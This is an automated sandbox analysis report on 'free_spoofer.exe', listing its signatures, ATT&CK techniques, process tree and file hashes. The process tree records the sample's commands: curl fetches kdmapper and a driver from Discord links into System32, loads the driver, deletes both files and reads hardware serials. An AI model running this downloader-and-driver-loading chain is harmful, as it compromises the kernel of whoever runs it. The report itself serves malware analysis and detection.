hxxps://cdn[.]discordapp[.]com/attachments/1086534913584549989/1109702901204529183/free_spoofer[.]exe

Analysis

max time kernel
1799s
max time network
1688s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
21/05/2023, 04:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1086534913584549989/1109702901204529183/free_spoofer.exe

Score

8^/10

persistence

Malware Config

Signatures

Downloads MZ/PE file

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\omZtLkEsXIGlAJG\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\omZtLkEsXIGlAJG"	map531.exe

Executes dropped EXE 2 IoCs

pid	Process
996	free_spoofer.exe
2304	map531.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\map531.exe	curl.exe
File created	C:\Windows\System32\EAC15.sys	curl.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133291250455810886"	chrome.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2984	chrome.exe
2984	chrome.exe
4856	chrome.exe
4856	chrome.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
2304	map531.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

pid	Process
2984	chrome.exe
2984	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeLoadDriverPrivilege	2304	map531.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeShutdownPrivilege	2984	chrome.exe
Token: SeCreatePagefilePrivilege	2984	chrome.exe
Token: SeIncreaseQuotaPrivilege	4296	WMIC.exe
Token: SeSecurityPrivilege	4296	WMIC.exe
Token: SeTakeOwnershipPrivilege	4296	WMIC.exe
Token: SeLoadDriverPrivilege	4296	WMIC.exe
Token: SeSystemProfilePrivilege	4296	WMIC.exe
Token: SeSystemtimePrivilege	4296	WMIC.exe
Token: SeProfSingleProcessPrivilege	4296	WMIC.exe
Token: SeIncBasePriorityPrivilege	4296	WMIC.exe
Token: SeCreatePagefilePrivilege	4296	WMIC.exe
Token: SeBackupPrivilege	4296	WMIC.exe
Token: SeRestorePrivilege	4296	WMIC.exe
Token: SeShutdownPrivilege	4296	WMIC.exe
Token: SeDebugPrivilege	4296	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4296	WMIC.exe
Token: SeRemoteShutdownPrivilege	4296	WMIC.exe
Token: SeUndockPrivilege	4296	WMIC.exe
Token: SeManageVolumePrivilege	4296	WMIC.exe
Token: 33	4296	WMIC.exe
Token: 34	4296	WMIC.exe
Token: 35	4296	WMIC.exe
Token: 36	4296	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4296	WMIC.exe
Token: SeSecurityPrivilege	4296	WMIC.exe
Token: SeTakeOwnershipPrivilege	4296	WMIC.exe
Token: SeLoadDriverPrivilege	4296	WMIC.exe
Token: SeSystemProfilePrivilege	4296	WMIC.exe
Token: SeSystemtimePrivilege	4296	WMIC.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe
2984	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2984 wrote to memory of 380	2984	chrome.exe	81
PID 2984 wrote to memory of 380	2984	chrome.exe	81
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 3084	2984	chrome.exe	82
PID 2984 wrote to memory of 4384	2984	chrome.exe	83
PID 2984 wrote to memory of 4384	2984	chrome.exe	83
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85
PID 2984 wrote to memory of 4052	2984	chrome.exe	85

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://cdn.discordapp.com/attachments/1086534913584549989/1109702901204529183/free_spoofer.exe
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff895659758,0x7ff895659768,0x7ff895659778
  2⤵
  PID:380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:2
  2⤵
  PID:3084
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:8
  2⤵
  PID:4384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:8
  2⤵
  PID:4052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3092 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:1
  2⤵
  PID:4200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3100 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:1
  2⤵
  PID:3216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4852 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:8
  2⤵
  PID:4152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4876 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:8
  2⤵
  PID:3936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4820 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:8
  2⤵
  PID:4024
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5220 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:8
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:8
  2⤵
  PID:3324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:8
  2⤵
  PID:3896
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5412 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:8
  2⤵
  PID:2732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5200 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:8
  2⤵
  PID:3776
- C:\Users\Admin\Downloads\free_spoofer.exe
  "C:\Users\Admin\Downloads\free_spoofer.exe"
  2⤵
  - Executes dropped EXE
  PID:996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1106576752232382567/1109134869570801744/kdmapper.exe --output C:\Windows\System32\map531.exe >nul 2>&1
    3⤵
    PID:4928
  - - C:\Windows\system32\curl.exe
      curl --silent https://cdn.discordapp.com/attachments/1106576752232382567/1109134869570801744/kdmapper.exe --output C:\Windows\System32\map531.exe
      4⤵
      Drops file in System32 directory
      PID:744
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mode con: cols=80 lines=25
    3⤵
    PID:4820
  - - C:\Windows\system32\mode.com
      mode con: cols=80 lines=25
      4⤵
      PID:4144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c Color 08
    3⤵
    PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:3836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1106576752232382567/1109110158845554818/EAC.sys --output C:\Windows\System32\EAC15.sys >nul 2>&1
    3⤵
    PID:1380
  - - C:\Windows\system32\curl.exe
      curl --silent https://cdn.discordapp.com/attachments/1106576752232382567/1109110158845554818/EAC.sys --output C:\Windows\System32\EAC15.sys
      4⤵
      Drops file in System32 directory
      PID:1004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\map531.exe C:\Windows\System32\EAC15.sys
    3⤵
    PID:4008
  - - C:\Windows\System32\map531.exe
      C:\Windows\System32\map531.exe C:\Windows\System32\EAC15.sys
      4⤵
      Sets service image path in registry
      Executes dropped EXE
      Suspicious behavior: LoadsDriver
      Suspicious use of AdjustPrivilegeToken
      PID:2304
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del C:\Windows\System32\map531.exe
    3⤵
    PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c del C:\Windows\System32\EAC15.sys
    3⤵
    PID:2404
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mode con: cols=80 lines=25
    3⤵
    PID:3896
  - - C:\Windows\system32\mode.com
      mode con: cols=80 lines=25
      4⤵
      PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c Color 08
    3⤵
    PID:3776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:2732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c Color 08
    3⤵
    PID:2116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mode con: cols=90 lines=45
    3⤵
    PID:2964
  - - C:\Windows\system32\mode.com
      mode con: cols=90 lines=45
      4⤵
      PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo [92m------------[91m
    3⤵
    PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic bios get serialnumber
    3⤵
    PID:3956
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic bios get serialnumber
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic csproduct get uuid
    3⤵
    PID:2148
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo CPU
    3⤵
    PID:1340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo [92m------------[91m
    3⤵
    PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get serialnumber
    3⤵
    PID:4228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get serialnumber
      4⤵
      PID:3844
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get processorid
    3⤵
    PID:3476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get processorid
      4⤵
      PID:2760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo Diskdrive
    3⤵
    PID:3672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo [92m------------[91m
    3⤵
    PID:3880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic diskdrive get serialnumber
    3⤵
    PID:3772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic diskdrive get serialnumber
      4⤵
      PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo Baseboard
    3⤵
    PID:1460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo [92m------------[91m
    3⤵
    PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic baseboard get serialnumber
    3⤵
    PID:3320
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic baseboard get serialnumber
      4⤵
      PID:1004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo Ram
    3⤵
    PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo [92m------------[91m
    3⤵
    PID:3884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic memorychip get serialnumber
    3⤵
    PID:3400
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic memorychip get serialnumber
      4⤵
      PID:460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo [92m------------[91m
    3⤵
    PID:5036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo GPU
    3⤵
    PID:1412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3556 --field-trial-handle=1888,i,14884137128790993471,3746202505505433132,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4856

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3700

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
5f85de723d39d18872d6987ecc67bafd

SHA1
b5239fdf6437eea652ca3e7e7feced5828151665

SHA256
234e4559f72e92dea524afec832c03bf07a6fa80b8f7a4ce42ac1ed36337fc30

SHA512
0ab7f262f6175004ed286b240949635a0dc436ae6496a6ede79084f703f15d40679338d2681265a705eea8713703a0733c855725bbd29d9aee766922fe3f5683

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
86fd079a52d6d1e932d3afaaf1969d09

SHA1
0fb62d43a19ece6c5b3fa9f657f053dfc2c5ec6b

SHA256
56954460377e223ff3f21a4e4668b6b45b4b1ea51581ae509069e4abae8d783d

SHA512
5fa06c4944a427193dcb7b929cc2bad029af1390118fe2b1d1bb76b08955df8acb3191a91bd0f124151fa2ddf5f7010ca3928b8bb68454361a26379e9ec4e844

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
15KB

MD5
5f8dce92e3b2a8aaef5567425e5c939d

SHA1
ad10c62be6981007694eff9569356dda1c7c29fa

SHA256
04c2c1dec98553e61aea74f6743d5c7efebf18db1488bf3627fdad5f24b44a7c

SHA512
0085a8c756578820ccc093c8d5d904bf2e0c29f0d5ee28b6dae71d3566bb344b9843a6a77e8a3fc840c461e673a5463ee1ee08e8d50a836c7dbaf413d745aff3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
151KB

MD5
541b7911b0a0edbdd8fd92cd19083c3e

SHA1
c8f78c9ff8b3429b0a7ee3c6c491c9bfb79b0141

SHA256
ac039ab3815463714b4421e2101a13951ccca75cb776551ff0ee333098681d61

SHA512
3b3b15ac5e2bfd6a1d56183e6ce19f3bd43b47481242d3469758e2869e8e24e3b34c13dbf3fe010ba13abb2676ab88c22a158d2c358bbb65486a6654711ce084

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\Downloads\free_spoofer.exe

Filesize
48KB

MD5
870949300d4ac00fc7dc0a878c47dcf6

SHA1
4abe0a74e80695d4f11dd5fd9ee8dafbe20c4ac3

SHA256
8dcba0f4f53d932e82aaaded7c313c4d1dff0a8e14cf4fc7c8527ceeccdf02a3

SHA512
4f04e74fa5ee89a4776df1c9dea532adbea58e10e9f3359fa98504484ee4332ca18281c0fafa061a31145ac2228f23175cad744da4782ba544b602dfb9386119

Download Submit
C:\Users\Admin\Downloads\free_spoofer.exe

Filesize
48KB

MD5
870949300d4ac00fc7dc0a878c47dcf6

SHA1
4abe0a74e80695d4f11dd5fd9ee8dafbe20c4ac3

SHA256
8dcba0f4f53d932e82aaaded7c313c4d1dff0a8e14cf4fc7c8527ceeccdf02a3

SHA512
4f04e74fa5ee89a4776df1c9dea532adbea58e10e9f3359fa98504484ee4332ca18281c0fafa061a31145ac2228f23175cad744da4782ba544b602dfb9386119

Download Submit
C:\Users\Admin\Downloads\free_spoofer.exe

Filesize
48KB

MD5
870949300d4ac00fc7dc0a878c47dcf6

SHA1
4abe0a74e80695d4f11dd5fd9ee8dafbe20c4ac3

SHA256
8dcba0f4f53d932e82aaaded7c313c4d1dff0a8e14cf4fc7c8527ceeccdf02a3

SHA512
4f04e74fa5ee89a4776df1c9dea532adbea58e10e9f3359fa98504484ee4332ca18281c0fafa061a31145ac2228f23175cad744da4782ba544b602dfb9386119

Download Submit
C:\Windows\System32\EAC15.sys

Filesize
6KB

MD5
8d0b8a78c757b172db294ac60c5adb82

SHA1
11a17750f99d01d06188103b13ed5687da85c5d6

SHA256
9e6af55d6a7ffeb30fdd6f2b65fd2f61c57f37e85af80c9797d57615505fa16a

SHA512
98448aaa555442ffbde556c78a4981a3038b295f39ce785abc6ea08dfbbf6d19d3f5a909586a796aa911c142f8f50e242fecee4482a92c111d3ce43335acecbf

Download Submit
C:\Windows\System32\map531.exe

Filesize
133KB

MD5
7d131f37ec248173a40de67fe42247e1

SHA1
214105325c39599a93f1752801250c8e8a7d67c6

SHA256
4a17b967d61c90765faa845e4735b0435391673e5600f71baf808a9c1ce168cf

SHA512
1d8cf6c5c4fc404aadd296b3a99e60aebf6566ceeea8c8b87d170ef1198b2bc8ebd99ed22139aa4306c8e964fcde3c9d11973f34e04a396391fbf90b06a88b44

Download Submit
C:\Windows\System32\map531.exe

Filesize
133KB

MD5
7d131f37ec248173a40de67fe42247e1

SHA1
214105325c39599a93f1752801250c8e8a7d67c6

SHA256
4a17b967d61c90765faa845e4735b0435391673e5600f71baf808a9c1ce168cf

SHA512
1d8cf6c5c4fc404aadd296b3a99e60aebf6566ceeea8c8b87d170ef1198b2bc8ebd99ed22139aa4306c8e964fcde3c9d11973f34e04a396391fbf90b06a88b44

Download Submit